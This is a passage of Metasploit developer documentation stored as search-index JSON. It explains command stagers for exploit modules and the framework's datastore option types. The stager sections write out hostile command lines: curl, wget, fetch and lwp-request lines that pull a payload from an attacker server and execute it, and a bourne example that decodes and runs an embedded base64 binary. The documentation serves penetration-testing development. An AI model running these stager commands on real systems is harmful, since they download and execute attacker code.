    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin"
  },"303": {
    "doc": "How to use command stagers",
    "title": "Flavors",
    "content": "Now that we know how to use the Msf::Exploit::CmdStager mixin, let’s take a look at the command stagers you can use. As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. It is also useful to know the printf flavor is the only flavor that embeds the payload into the commands but does not use echo. Available flavors: . Flavors requiring the payload to be broken apart and embedded into the commands: . | bourne | certutil | debug_asm | debug_write | echo | printf | vbs | . Flavors that rely on using a command to retrieve the payload via network connection . | curl | fetch | lwprequest | psh_invokewebrequest | tftp | wget | . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#flavors",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#flavors"
  },"304": {
    "doc": "How to use command stagers",
    "title": "VBS Command Stager - Windows Only",
    "content": "The VBS command stager is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a VBS script using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it. If you are exploiting Windows that supports Powershell, then you might want to consider using that instead of the VBS stager, because Powershell tends to be more stealthy. To use the VBS stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'vbs' ] . Or set the :vbs key to execute_cmdstager: . execute_cmdstager(flavor: :vbs) . You will also need to make sure the module’s supported platforms include windows (also in the metadata), example: . 'Platform' =&amp;gt; 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#vbs-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#vbs-command-stager---windows-only"
  },"305": {
    "doc": "How to use command stagers",
    "title": "Certutil Command Stager - Windows Only",
    "content": "Certutil is a Windows command that can be used to dump and display certification authority, configuration information, configure certificate services, back up and restore CA components, etc. It only comes with newer Windows systems starting from Windows 2012, and Windows 8. I find the certutil flavor confusing, as certutil can be used to download files just like wget and ftp, we do not use it that way here; instead we use echo to write the file as a base64 encoded certificate, and then we use certutil to decode it prior to execution: . echo -----BEGIN CERTIFICATE----- &amp;gt; encoded.txt echo Just Base64 encode your binary data echo TVoAAA== &amp;gt;&amp;gt; encoded.txt echo -----END CERTIFICATE----- &amp;gt;&amp;gt; encoded.txt certutil -decode encoded.txt decoded.bin . To take advantage of that, the Certutil command stager will save the payload in Base64 as a fake certificate, ask certutil to decode it, and then finally execute it. To use the Certutil command stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'certutil' ] . Or set the :certutil key to execute_cmdstager: . execute_cmdstager(flavor: :certutil) . You will also need to remember to set the platform in the metadata: . 'Platform' =&amp;gt; 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#certutil-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#certutil-command-stager---windows-only"
  },"306": {
    "doc": "How to use command stagers",
    "title": "Debug_write Command Stager - Windows Only",
    "content": "The debug_write command stager is an old Windows trick to write a file to the system. In this case, we use debug.exe to write a small .Net binary, and that binary will take a hex-ascii file created by the echo command, decode the binary, and finally execute. Obviously, to be able to use this command stager, you must make sure the target is a Windows system that supports .Net. To use the debug_write command stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'debug_write' ] . Or set the :debug_write key to execute_cmdstager: . execute_cmdstager(flavor: :debug_write) . You will also need to remember to set the platform in the metadata: . 'Platform' =&amp;gt; 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_write-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_write-command-stager---windows-only"
  },"307": {
    "doc": "How to use command stagers",
    "title": "Debug_asm Command Stager - Windows Only",
    "content": "The debug_asm command stager is another old Windows trick used to assemble a COM file, and then COM file will decode our hex-ascii payload, and then execute it. To use the debug_asm command stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'debug_asm' ] . Or set the :debug_asm key to execute_cmdstager: . execute_cmdstager(flavor: :debug_asm) . You will also need to remember to set the platform in the metadata: . 'Platform' =&amp;gt; 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_asm-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#debug_asm-command-stager---windows-only"
  },"308": {
    "doc": "How to use command stagers",
    "title": "TFTP Command Stager - Windows Only",
    "content": "The TFTP command stager uses tftpd.exe to download our payload, and then use the start.exe command to execute it. This technique only works well against an older version of Windows (such as XP), because newer Windows machines no longer install tftp.exe by default. The TFTP command stager must bind to UDP port 69, so msfconsole must be started as root: . rvmsudo ./msfconsole . To use the TFTP stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'tftp' ] . Or set the :tftp key to execute_cmdstager: . execute_cmdstager(flavor: :tftp) . You will also need to remember to set the platform in the metadata: . 'Platform' =&amp;gt; 'win' . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#tftp-command-stager---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#tftp-command-stager---windows-only"
  },"309": {
    "doc": "How to use command stagers",
    "title": "PowerShell Invoke-WebRequest - Windows Only",
    "content": "To use the PowerShell Invoke-WebRequest stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'psh_invokewebrequest' ] . Or set the :psh_invokewebrequest key to execute_cmdstager: . execute_cmdstager(flavor: :psh_invokewebrequest ) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#powershell-invoke-webrequest---windows-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#powershell-invoke-webrequest---windows-only"
  },"310": {
    "doc": "How to use command stagers",
    "title": "Bourne Command Stager - Multi Platform",
    "content": "Linemax minimum: 373 . The Bourne command stager supports multiple platforms except for Windows. Just like many other stagers, it writes a base64 encoded payload to disk, but then it tries to decode it using four different commands: base64, openssl, python, and perl. This is very useful if the target’s OS is unpredictable. You can see the way it attempts to use multiple decoding techniques by setting verbose to true and launching an exploit that has bourne as a supported command stager flavor and selecting it as the flavor: . [*] Generated command stager: [\"echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAA AAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoK QVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXAoFh8lRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+ Wg8FSIXAeO3/5g==&amp;gt;&amp;gt;'/tmp/XtMnQ.b64' ; ((which base64 &amp;gt;&amp;amp;2 &amp;amp;&amp;amp; base64 -d -) || (which base64 &amp;gt;&amp;amp;2 &amp;amp;&amp;amp; base64 --decode -) || (w hich openssl &amp;gt;&amp;amp;2 &amp;amp;&amp;amp; openssl enc -d -A -base64 -in /dev/stdin) || (which python &amp;gt;&amp;amp;2 &amp;amp;&amp;amp; python -c 'import sys, base64; pri nt base64.standard_b64decode(sys.stdin.read());') || (which perl &amp;gt;&amp;amp;2 &amp;amp;&amp;amp; perl -MMIME::Base64 -ne 'print decode_base64($_) ')) 2&amp;gt; /dev/null &amp;gt; '/tmp/IPUov' &amp;lt; '/tmp/XtMnQ.b64' ; chmod +x '/tmp/IPUov' ; '/tmp/IPUov' ; rm -f '/tmp/IPUov' ; rm -f ' /tmp/XtMnQ.b64'\"] . To use the Bourne stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'bourne' ] . Or set the :bourne key to execute_cmdstager: . execute_cmdstager(flavor: :bourne) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#bourne-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#bourne-command-stager---multi-platform"
  },"311": {
    "doc": "How to use command stagers",
    "title": "Echo Command Stager - Multi Platform",
    "content": "Linemax minimum: 26 . The echo command stager is suitable for multiple platforms except for Windows. It just echos the payload, chmod and execute it. An example of that looks similar to this: . echo -en \\\\x41\\\\x41\\\\x41\\\\x41 &amp;gt;&amp;gt; /tmp/payload ; chmod 777 /tmp/payload ; /tmp/payload ; rm -f /tmp/payload . To use the echo stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'echo' ] . Or set the :echo key to execute_cmdstager: . execute_cmdstager(flavor: :echo) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#echo-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#echo-command-stager---multi-platform"
  },"312": {
    "doc": "How to use command stagers",
    "title": "Printf Command Stager - Multi Platform",
    "content": "Linemax minimum: 25 . The printf command stager is also suitable for multiple platforms except for Windows. It just uses the printf command to write the payload to disk, chmod and execute it. An example of that looks similar to this: . printf '\\177\\177\\177\\177' &amp;gt;&amp;gt; /tmp/payload ; chmod +x /tmp/payload ; /tmp/payload ; rm -f /tmp/payload . To use the printf stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'printf' ] . Or set the :printf key to execute_cmdstager: . execute_cmdstager(flavor: :printf) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#printf-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#printf-command-stager---multi-platform"
  },"313": {
    "doc": "How to use command stagers",
    "title": "cURL Command Stager - Multi Platform",
    "content": "The cURL command stager uses the curl command on the target host to download the payload file. It requires users to specify a SRVHOST and SRVPORT values and will start an HTTP server to host the payload file. An example of that looks similar to this: . curl -so /tmp/dtNGlaaL http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/dtNGlaaL;/tmp/dtNGlaaL;rm -f /tmp/dtNGlaaL\" . To use the cURL stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'curl' ] . Or set the :curl key to execute_cmdstager: . execute_cmdstager(flavor: :curl) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#curl-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#curl-command-stager---multi-platform"
  },"314": {
    "doc": "How to use command stagers",
    "title": "wget Command Stager - Multi Platform",
    "content": "The wget command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the wget command. It requires users to specify a SRVHOST and SRVPORT values and will start an HTTP server to host the payload file. An example of that looks similar to this: . wget -qO /tmp/MZXxujch http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/MZXxujch;/tmp/MZXxujch;rm -f /tmp/MZXxujch . To use the wget stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'wget' ] . Or set the :wget key to execute_cmdstager: . execute_cmdstager(flavor: :wget) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#wget-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#wget-command-stager---multi-platform"
  },"315": {
    "doc": "How to use command stagers",
    "title": "LWP Request Command Stager - Multi Platform",
    "content": "The lwp-request command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the lwp-request command. It requires users to specify a SRVHOST and SRVPORT values and will start an HTTP server to host the payload file. An example of that looks similar to this: . lwp-request -m GET http://10.5.135.201:8080/mdkwKcdGCtU &amp;gt; /tmp/OKOnDYwn;chmod +x /tmp/OKOnDYwn;/tmp/OKOnDYwn;rm -f /tmp/OKOnDYwn . To use the lwprequest stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'lwprequest' ] . Or set the :lwprequest key to execute_cmdstager: . execute_cmdstager(flavor: :lwprequest) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#lwp-request-command-stager---multi-platform",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#lwp-request-command-stager---multi-platform"
  },"316": {
    "doc": "How to use command stagers",
    "title": "Fetch Command Stager - BSD Only",
    "content": "The fetch command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the fetch command. It requires users to specify a SRVHOST and SRVPORT values and will start an HTTP server to host the payload file. An example of that looks similar to this: . fetch -qo /tmp/UGWuPPcy http://10.5.135.201:8080/mdkwKcdGCtU;chmod +x /tmp/UGWuPPcy;/tmp/UGWuPPcy;rm -f /tmp/UGWuPPcy . To use the fetch stager, either specify your CmdStagerFlavor in the metadata: . 'CmdStagerFlavor' =&amp;gt; [ 'fetch' ] . Or set the :fetch key to execute_cmdstager: . execute_cmdstager(flavor: :fetch) . ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#fetch-command-stager---bsd-only",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html#fetch-command-stager---bsd-only"
  },"317": {
    "doc": "How to use command stagers",
    "title": "How to use command stagers",
    "content": "If you’ve found a way to execute a command on a target, and you’d like the leverage that ability to execute a command into a meterpreter session, command stagers are for you. Command stagers provide an easy way to write exploits that leverage vulnerabilities such as command execution or code injection and turn them into sessions. There are currently 14 different flavors of command stagers, each uses system command (or commands) to save (or not save) your payload, sometimes decode, and execute. The hardest part about command stagers is understanding how much they do and what they do. All you need to do for a command stager is to define how the command injection works in the execute_command method and then select a few options. ",
    "url": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-use-command-stagers.html"
  },"318": {
    "doc": "How to use datastore options",
    "title": "Datastore Option Overview",
    "content": "A datastore option is a type of variable that can be set by the user, allowing various components of Metasploit to be more configurable during use. For example, in msfconsole, you can set the ConsoleLogging option in order to log all the console input/output - something that’s kind of handy for documentation purposes during a pentest. When you load a module, there will be a lot more options registered by the mixin(s) or the module. Some common ones include RHOSTS and RPORT for a server-side exploit or auxiliary module, SRVHOST for a client-side module, etc. The best way to find out exactly what datastore options you can set is by using these commands: . | show options - Shows you all the basic options. | show advanced - Shows you all the advanced options. | show missing - Shows you all the required options you have not configured. | set - Shows you everything. Obviously, you also use this command to set an option. | . Option sources: ModuleDataStore, active_module, session, and framework . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#datastore-option-overview",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#datastore-option-overview"
  },"319": {
    "doc": "How to use datastore options",
    "title": "How users look at datastore options",
    "content": "On the user’s side, datastore options are seen as global or module-level: Global means all the modules can use that option, which can be set by using the setg command. Module-level means only that particular module you’re using remembers that datastore option, no other components will know about it. You are setting a module-level option if you load a module first, and then use the set command, like the following: . msf &amp;gt; use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) &amp;gt; set rhost 10.0.1.3 rhost =&amp;gt; 10.0.1.3 . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-users-look-at-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-users-look-at-datastore-options"
  },"320": {
    "doc": "How to use datastore options",
    "title": "How Metasploit developers look at datastore options",
    "content": "On the development side, things are a little crazier. Datastore options actually can be found in at least four different sources: the ModuleDataStore object, active_module, session object, or the framework object. If you’re just doing module development, the best source you can trust is the ModuleDataStore object. This object has a specific load order before handing you the option you want: if the option can be found in the module’s datastore, it will give you that. If not found, it will give you the one from framework. The following is an example of how to read a datastore option in a module: . current_host = datastore['RHOST'] . If your dev work is outside the module realm, there is a good possibility that you don’t even have the ModuleDataStore object. But in some cases, you still might be able to read from the active_module accessor from the driver. Or if you have access to ModuleCommandDispatcher, there is a mod method too that gives you the same thing, and sometimes mixins pass this around in a run_simple method while dispatching a module. One example you can look at is the Msf::Ui::Console::CommandDispatcher::Auxiliary class. In some cases such as running a script in post exploitation, you might not have ModuleDataStore or even active_module, but you should still have a session object. There should be an exploit_datastore that gives you all the datastore options: . session.exploit_datastore . If you don’t have access to the module, or to a session object, the last source is obviously the framework object, and there is ALWAYS a framework object. However, like we said earlier, if the user sets a module-level option, no other components will see it, this includes the framework object: . framework.datastore . So now you know there are multiple sources of datastore options. And hopefully at this point you are well aware that not all sources necessarily share the same thing. If you have to try everything, as a general rule, this should be your load order: . | Try from the ModuleDataStore | Try from active_module | Try from session | Try from framework | . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-metasploit-developers-look-at-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#how-metasploit-developers-look-at-datastore-options"
  },"321": {
    "doc": "How to use datastore options",
    "title": "Core option types",
    "content": "All core datastore option types are defined in the option_container.rb file as classes. You should always pick the most appropriate one because each has its own input validator. When you initialize an option during datastore registration, it should be in the following format: . OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *aliases*, conditions: *conditions*) . | option_name - Clearly means the name of the datastore option. | boolean - The first attribute, true means this is a required option, false means optional. | description - A short description about this option | value - A default value. Note if the first attribute is false, you don’t need to provide a value, it’ll be set to nil automatically. | enums - optional An array of acceptable values, e.g. %w[ LEFT RIGHT ]. | aliases - optional, key-word only An array of additional names that refer to this option. This is useful when renaming a datastore option to retain backward compatibility. See the Renaming datastore options section for more information | conditions - optional, key-word only An array of a condition for which the option should be displayed. This can be used to hide options when they are irrelevant based on other configurations. See the Filtering datastore options section for more information. | fallbacks optional, key-word only An array of names that will be used as a fallback if the main option name is defined by the user. This is useful in the scenario of wanting specialised option names such as SMBUser, but to also support gracefully checking a list of more generic fallbacks option names such as Username. This functionality is currently behind a feature flag, set with features set datastore_fallbacks true in msfconsole | . Now let’s talk about what classes are available: . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#core-option-types",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#core-option-types"
  },"322": {
    "doc": "How to use datastore options",
    "title": "OptAddress",
    "content": "An input that is an IPv4 address. Code example: . OptAddress.new('IP', [ true, 'Set an IP', '10.0.1.3' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddress",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddress"
  },"323": {
    "doc": "How to use datastore options",
    "title": "OptAddressRange",
    "content": "An input that is a range of IPv4 addresses, for example: 10.0.1.1-10.0.1.20, or 10.0.1.1/24. You can also supply a file path instead of a range, and it will automatically treat that file as a list of IPs. Or, if you do the rand:3 syntax, with 3 meaning 3 times, it will generate 3 random IPs for you. Basic code example: . OptAddressRange.new('Range', [ true, 'Set an IP range', '10.0.1.3-10.0.1.23' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddressrange",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optaddressrange"
  },"324": {
    "doc": "How to use datastore options",
    "title": "OptBool",
    "content": "Boolean option. It will validate if the input is a variant of either true or false. For example: y, yes, n, no, 0, 1, etc. Code example: . OptBool.new('BLAH', [ true, 'Set a BLAH option', false ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optbool",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optbool"
  },"325": {
    "doc": "How to use datastore options",
    "title": "OptEnum",
    "content": "Basically this will limit the input to specific choices. For example, if you want the input to be either “apple”, or “orange”, and nothing else, then OptEnum is the one for you. Code example: . # Choices are: apple or range, defaults to apple OptEnum.new('FRUIT', [ true, 'Set a fruit', 'apple', ['apple', 'orange']]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optenum",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optenum"
  },"326": {
    "doc": "How to use datastore options",
    "title": "OptInt",
    "content": "This can be either a hex value, or decimal. OptInt.new('FILE', [ true, 'A hex or decimal', 1024 ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optint",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optint"
  },"327": {
    "doc": "How to use datastore options",
    "title": "OptPath",
    "content": "If your datastore option is asking for a local file path, then use this. OptPath.new('FILE', [ true, 'Load a local file' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optpath",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optpath"
  },"328": {
    "doc": "How to use datastore options",
    "title": "OptPort",
    "content": "For an input that’s meant to be used as a port number. This number should be between 0 - 65535. Code example: . OptPort.new('RPORT', [ true, 'Set a port', 21 ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optport",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optport"
  },"329": {
    "doc": "How to use datastore options",
    "title": "OptRaw",
    "content": "It actually functions exactly the same as OptString. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optraw",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optraw"
  },"330": {
    "doc": "How to use datastore options",
    "title": "OptRegexp",
    "content": "Datastore option is a regular expression. OptRegexp.new('PATTERN', [true, 'Match a name', '^alien']), . Other types: . In some cases, there might not be a well-suited datastore option type for you. The best example is an URL: even though there’s no such thing as a OptUrl, what you can do is use the OptString type, and then in your module, do some validation for it, like this: . def valid?(input) if input =~ /^http:\\/\\/.+/i return true else # Here you can consider raising OptionValidateError return false end end if valid?(datastore['URL']) # We can do something with the URL else # Not the format we're looking for. Refuse to do anything. end . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optregexp",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optregexp"
  },"331": {
    "doc": "How to use datastore options",
    "title": "OptString",
    "content": "Typically for a string option. If the input begins with “file://”, OptString will also automatically assume this is a file, and read from it. However, there is no file path validation when this happens, so if you want to load a file, you should use the OptPath instead, and then read the file yourself. Code example: . OptString.new('MYTEST', [ true, 'Set a MYTEST option', 'This is a default value' ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optstring",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#optstring"
  },"332": {
    "doc": "How to use datastore options",
    "title": "Registering and deregistering module options",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#registering-and-deregistering-module-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#registering-and-deregistering-module-options"
  },"333": {
    "doc": "How to use datastore options",
    "title": "The register_options method",
    "content": "The register_options method can register multiple basic datastore options. Basic datastore options are the ones that either must be configured, such as the RHOST option in a server-side exploit. Or it’s very commonly used, such as various username/password options found in a login module. The following is an example of registering multiple datastore options in a module: . register_options( [ OptString.new('SUBJECT', [ true, 'Set a subject' ]), OptString.new('MESSAGE', [ true, 'Set a message' ]) ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_options-method",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_options-method"
  },"334": {
    "doc": "How to use datastore options",
    "title": "The register_advanced_options method",
    "content": "The register_advanced_options method can register multiple advanced datastore options. Advanced datastore options are the ones that never require the user to configure before using the module. For example, the Proxies option is almost always considered as “advanced”. But of course, it can also mean that’s something that most user will find difficult to configure. An example of register an advanced option: . register_advanced_options( [ OptInt.new('Timeout', [ true, 'Set a timeout, in seconds', 60 ]) ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_advanced_options-method",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-register_advanced_options-method"
  },"335": {
    "doc": "How to use datastore options",
    "title": "The deregister_options method",
    "content": "The deregister_options method can deregister either basic or advanced options. Usage is really straight-forward: . deregister_options('OPTION1', 'OPTION2', 'OPTION3') . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-deregister_options-method",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#the-deregister_options-method"
  },"336": {
    "doc": "How to use datastore options",
    "title": "Changing the default value for a datastore option",
    "content": "When a datastore option is already registered by a mixin, there are still ways to change the default value from the module. You can either use the register_options method, or adding a DefaultOptions key in the module’s metadata. Using the DefaultOptions key is preferred because the option’s description and other attributes will remain unchanged. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#changing-the-default-value-for-a-datastore-option",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#changing-the-default-value-for-a-datastore-option"
  },"337": {
    "doc": "How to use datastore options",
    "title": "Using register_options to change the default value",
    "content": "One of the advantages of using register_options is that if the datastore option is advanced, this allows it to be on the basic option menu, meaning when people do “show options” on msfconsole, that option will be there instead. You also get to change the option description, and whether it should be required or not with this method. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-register_options-to-change-the-default-value",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-register_options-to-change-the-default-value"
  },"338": {
    "doc": "How to use datastore options",
    "title": "Using DefaultOptions to change the default value",
    "content": "When Metasploit initializes a module, an import_defaults method is called. This method will update all existing datastore options (which is why register_options can be used to update default values), and then it will specifically check the DefaultOptions key from the module’s metadata, and update again. Here’s an example of an exploit module’s initialize portion with the DefaultOptions key: . def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Module name', 'Description' =&amp;gt; %q{ This is an example of setting the default value of RPORT using the DefaultOptions key }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Name' ], 'References' =&amp;gt; [ [ 'URL', '' ] ], 'Platform' =&amp;gt; 'win', 'Targets' =&amp;gt; [ [ 'Windows', { 'Ret' =&amp;gt; 0x41414141 } ] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'DefaultOptions' =&amp;gt; { 'RPORT' =&amp;gt; 8080 }, 'Privileged' =&amp;gt; false, 'DisclosureDate' =&amp;gt; '', 'DefaultTarget' =&amp;gt; 0 ) ) end . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-defaultoptions-to-change-the-default-value",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#using-defaultoptions-to-change-the-default-value"
  },"339": {
    "doc": "How to use datastore options",
    "title": "Modifying datastore options at run-time",
    "content": "Currently, the safest way to modify a datastore option at run-time is to override a method. For example, some mixins retrieve the RPORT option like this: . def rport datastore['RPORT'] end . In that scenario, you can override this rport method from your module, and return a different value: . def rport 80 end . This way, when a mixin wants that information, it will end up with the value 80, and not whatever is actually in datastore['RPORT']. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#modifying-datastore-options-at-run-time",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#modifying-datastore-options-at-run-time"
  },"340": {
    "doc": "How to use datastore options",
    "title": "Ideal datastore naming",
    "content": "Normal options are always UPPERCASE, advanced options are CamelCase, advanced options with a similar purpose are Prefixed::CamelCase. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#ideal-datastore-naming",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#ideal-datastore-naming"
  },"341": {
    "doc": "How to use datastore options",
    "title": "Renaming datastore options",
    "content": "Options can be renamed and retain backward compatibility by using the alias: keyword argument in the new option. For example, to rename OldOption to NewOption, the new definitions would look something like: . OptString.new('NewOption', [true, 'A (sort of) new option', 'hello'], aliases: %w[ OldOption ]) . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#renaming-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#renaming-datastore-options"
  },"342": {
    "doc": "How to use datastore options",
    "title": "Filtering datastore options",
    "content": "Options can be hidden in certain conditions using the conditions: keyword argument to their definition. This allows options to be hidden when they are not relevant based on the value of another option, the selected target or the selected action. The syntax for a condition is *thing* *operator* *value*. | thing - One of ACTION, TARGET or the name of a datastore option. | operator - One of ==, !=, in, nin. In the case of in and nin (not-in), the value is an array of values. | value - The value to check for in the condition. | . When the condition evaluates to true, the option is considered active and displayed to the user. Datastore options with no defined conditions are active by default. ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filtering-datastore-options",
    "relUrl": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filtering-datastore-options"
  },"343": {
    "doc": "How to use datastore options",
    "title": "Filter examples",
    "content": ". | conditions: %w[VERSION == 5] - Active when the VERSION datastore option is 5. | conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]] - Active when the ACTION is one of SSRF, EXEC or SECSTORE | . ",
    "url": "/docs/development/developing-modules/module-metadata/how-to-use-datastore-options.html#filter-examples",
